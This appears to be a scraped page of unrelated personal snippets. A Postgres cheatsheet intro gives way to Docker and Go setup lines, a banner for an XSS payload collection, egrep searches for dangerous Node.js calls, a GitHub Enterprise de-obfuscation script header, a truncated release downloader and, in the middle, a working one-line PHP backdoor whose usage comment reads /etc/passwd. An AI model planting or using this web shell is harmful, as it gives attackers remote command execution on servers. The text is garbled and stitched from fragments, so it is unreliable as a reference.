Jayson Grace l50

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Postgres Cheatsheet

This is a collection of the most common commands I run while administering Postgres databases. The variables shown between the open and closed tags, "<" and ">", should be replaced with a name you choose. Postgres has multiple shortcut functions, starting with a forward slash, "". Any SQL command that is not a shortcut, must end with a semicolon, ";". You can use the keyboard UP and DOWN keys to scroll the history of previous commands you've run.

Setup

installation, Ubuntu

http://www.postgresql.org/download/linux/ubuntu/ https://help.ubuntu.com/community/PostgreSQL

	# Ask for the user password
	# Script only works if sudo caches the password for a few minutes
	sudo true

	# Install kernel extra's to enable docker aufs support
	# sudo apt-get -y install linux-image-extra-$(uname -r)

	# Add Docker PPA and install latest version
	# sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9
	# sudo sh -c "echo deb https://get.docker.io/ubuntu docker main > /etc/apt/sources.list.d/docker.list"

	_____ _ _ _ __ _______ _____ _____ _ _ _ _
	\| __ \ \| \| \| \| \| \ \ / / ___/ ___\| / __ \ \| \| \| \| \| \| \|
	\| \| \/ \|__ ___\| \|_\| \|_ ___ \ V /\ `--.\ `--. \| / \/ \|__ ___ __ _\| \|_ ___\| \|__ ___ ___\| \|_
	\| \| __\| '_ \ / _ \ __\| __\|/ _ \ / \ `--. \`--. \ \| \| \| '_ \ / _ \/ _` \| __/ __\| '_ \ / _ \/ _ \ __\|
	\| \|_\ \ \| \| \| __/ \|_\| \|_\| (_) \| / /^\ \|\__/ /\__/ / \| \__/\ \| \| \| __/ (_\| \| \|_\__ \ \| \| \| __/ __/ \|_
	\____/_\| \|_\|\___\|\__\|\__\|\___/ \/ \\|____/\____/ \____/_\| \|_\|\___\|\__,_\|\__\|___/_\| \|_\|\___\|\___\|\__\|

	A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

	Simple character manipulations.

	# Set variables in .bashrc file

	# don't forget to change your path correctly!

	export GOPATH=$HOME/golang
	export GOROOT=/usr/local/opt/go/libexec
	export PATH=$PATH:$GOPATH/bin
	export PATH=$PATH:$GOROOT/bin

	# this command will return instances where the child_process module is loaded.
	# that module is generally a good signal that the application is shelling out
	egrep -r --exclude-dir "node_modules" --include ".js" --exclude ".min." -e "require(\s)\((\s)'child_process'(\s))" .

	# this command will return instances where code is dynamically executed.
	egrep -r --exclude-dir "node_modules" --include ".js" --exclude ".min." -e "eval(\s)\(" .

	# this command will check common dangerous functions and report when strings are arguments
	egrep -r --exclude-dir "node_modules" --include ".js" --exclude ".min." -e "(setInterval\|setTimeout\|new(\s)Function)(\s)\((\s)\".*\"" .

	#!/usr/bin/sudo sh

	## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.

	## From `strings ruby_concealer.so`:
	##
	## > This obfuscation is intended to discourage GitHub Enterprise customers
	## > from making modifications to the VM.
	##
	## Well, good, as long as its not intended to discourage me from doing this!

	<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
	<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
	<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

	# starting simple HTTP server with Python in background
	screen -d -m python -m SimpleHTTPServer 7777

	# killing process running with screen in background
	kill -9 `top -n 1 \| pgrep screen`

	#!/usr/bin/env bash
	#
	# gh-dl-release! It works!
	#
	# This script downloads an asset from latest or specific Github release of a
	# private repo. Feel free to extract more of the variables into command line
	# parameters.
	#
	# PREREQUISITES
	#